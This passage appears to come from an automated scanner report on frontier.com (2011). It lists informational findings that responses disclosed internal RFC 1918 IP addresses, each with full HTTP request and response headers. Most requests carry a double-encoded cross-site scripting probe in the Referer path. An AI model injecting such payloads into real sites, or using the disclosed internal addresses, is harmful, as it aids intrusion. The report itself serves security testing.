User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wwe4li45cd3p3qmxxunqye55; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:11:37 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 4620

@CHARSET "ISO-8859-1";


.cf:after {content: "."; display: block; height: 0; clear: both; visibility: hidden; }
.cf {display: inline-block;} /* for IE/Mac */
*html .cf { zoom: 1;display: block;
...[SNIP]...

19.18. http://frontier.com/Controls/VirtualCode.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Controls/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:03:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=55lskvumgowh0r45t52u43vf; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:14:22 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 22788

#iframeDiv {

}

#iframeDiv iframe {
width: 900px;
height: 1000px;
border: none;
overflow: auto;
}

body
{
MARGIN-TOP: 0px;
MARGIN-LEFT: 0px;
CO
...[SNIP]...

19.19. http://frontier.com/Js/formHelpers.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/formHelpers.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/formHelpers.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 7911
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Jul 2011 16:59:13 GMT
Accept-Ranges: bytes
ETag: "806da59fe46cc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

var screenX=0;
var screenY=0;
document.onmousedown=getMouseXY;


function getMouseXY(e){
   if(document.all) e=event;
   screenX=e.screenX;
   screenY=e.screenY;
}
function fixDecimal(fld){
   va
...[SNIP]...

19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery-1.4.4.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/jQuery/jquery-1.4.4.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8826CMWWL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 78768
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Jun 2011 17:54:21 GMT
Accept-Ranges: bytes
ETag: "804f195172dcc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery.maskedinput.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/jQuery/jquery.maskedinput.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8824CMWWW; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3548
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 19:43:08 GMT
Accept-Ranges: bytes
ETag: "0eed37c7d8acb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:06 GMT

.../*
   Masked Input plugin for jQuery
   Copyright (c) 2007-2009 Josh Bush (digitalbush.com)
   Licensed under the MIT license (http://digitalbush.com/projects/masked-input-plugin/#license)
   Version:
...[SNIP]...

19.22. http://frontier.com/Js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/s_code.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Js/s_code.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/HBX/hbx.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/HBX/hbx.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8825CMWWK; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 16427
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 21:06:52 GMT
Accept-Ranges: bytes
ETag: "07e5d2f898acb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/* IN
...[SNIP]...

19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jq.client.plugin.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jq.client.plugin.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8826CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 2858
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 13:38:16 GMT
Accept-Ranges: bytes
ETag: "054a9c04cd7cb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

(function() {
   
   var BrowserDetect = {
       init: function () {
           this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
           this.version = this.searchVersion(navigator.userAgen
...[SNIP]...

19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-1.4.2.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 72328
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-jtemplates.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-jtemplates.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 9709
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/* jTemplates 0.7.8 (http://jtemplates.tpython.com) Copyright (c) 2009 Tomasz Gloc */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.
...[SNIP]...

19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-ui.min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery-ui.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 196163
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

/*!
* jQuery UI 1.8.5
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jqu
...[SNIP]...

19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery.json-2.2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Resources/3rdParty/JQuery/jquery.json-2.2.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 5769
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/*
* jQuery JSON Plugin
* version: 2.1 (2009-08-14)
*
* This document is licensed as free software under the terms of the
* MIT License: http://www.opensource.org/licenses/mit-license.php

...[SNIP]...

19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/frontier_Logo.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/frontier_Logo.jpg HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 4184
Content-Type: image/jpeg
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "7023584be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:09 GMT

...[SNIP]...

19.30. http://frontier.com/images/FTRMain/gradientBox.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/gradientBox.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/gradientBox.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8827CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 35375
Content-Type: image/png
Last-Modified: Thu, 12 May 2011 10:59:50 GMT
Accept-Ranges: bytes
ETag: "6227d5b69310cc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:55 GMT

...[SNIP]...

19.31. http://frontier.com/images/FTRMain/small_arrow.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/small_arrow.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/FTRMain/small_arrow.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 168
Content-Type: image/png
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "24e85c4be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT


19.32. http://frontier.com/images/icon_print.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/icon_print.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/icon_print.gif HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8827CMWWO; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 107
Content-Type: image/gif
Last-Modified: Thu, 05 Apr 2007 14:26:24 GMT
Accept-Ranges: bytes
ETag: "603f7b638e77c71:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

GIF89a.............fff333!.......,........@.<...6....J.9$.w.diS.)...*.)......"@....xY..P8."skmp.....:..E..;

19.33. http://frontier.com/js/jquery/jquery.numeric.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /js/jquery/jquery.numeric.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/jquery/jquery.numeric.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3790
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Jul 2010 19:17:28 GMT
Accept-Ranges: bytes
ETag: "094ffae522fcb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/*
*
* Copyright (c) 2006/2007 Sam Collett (http://www.texotela.co.uk)
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* Version 1.0
* Demo: htt
...[SNIP]...

19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "64bd627bb6f1eb7845f4f8e6db00b15e"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.64.223.51
X-Cnection: close
Content-Length: 6585
Cache-Control: public, max-age=1082
Expires: Tue, 06 Sep 2011 13:07:44 GMT
Date: Tue, 06 Sep 2011 12:49:42 GMT
Connection: close

/*1315005401,172023603,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=12022
Expires: Tue, 06 Sep 2011 15:20:03 GMT
Date: Tue, 06 Sep 2011 11:59:41 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2d89b260c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=9114
Expires: Tue, 06 Sep 2011 15:22:24 GMT
Date: Tue, 06 Sep 2011 12:50:30 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
